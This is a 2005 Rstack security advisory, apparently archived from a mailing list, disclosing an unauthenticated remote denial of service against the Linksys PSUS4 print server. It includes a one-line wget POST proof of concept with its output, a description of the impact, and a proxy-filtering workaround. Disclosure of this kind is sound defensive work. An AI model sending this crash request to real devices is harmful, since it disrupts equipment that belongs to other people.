<<< Date Index >>>     <<< Thread Index >>>

[ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4




- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rstack Public Security Advisory                           RSTACK SA200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://rstack.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Linksys PSUS4 remote Denial of Service
      Date: February 02, 2005
        ID: 200502-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Background
==========

PSUS4 is one of the small embedded Linksys wired print servers.

Affected products
=================

Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)

Description
===========

Rstack team found a tiny denial of service on the Linksys PSUS4. This device 
has problems to handle some weird ugly HTTP requests. No password needed.

Here is an example, to crash a remote PSUS4 :

$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05--  http://192.168.1.2/
           => `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...

=> And the PSUS4 is crashed.


Impact
======

A remote attacker could crash the device (DOS).

Workaround
==========

There is no official workaround at that time. Linksys has been contacted and a 
patch should be available in the future (*).
In needed, you can try to filter incoming requests by using a specific 
dedicated reverse proxy, but that might be a too big solution for such a little 
device (hint: a reboot will be necessary after each crash).

(*) "ou pas"...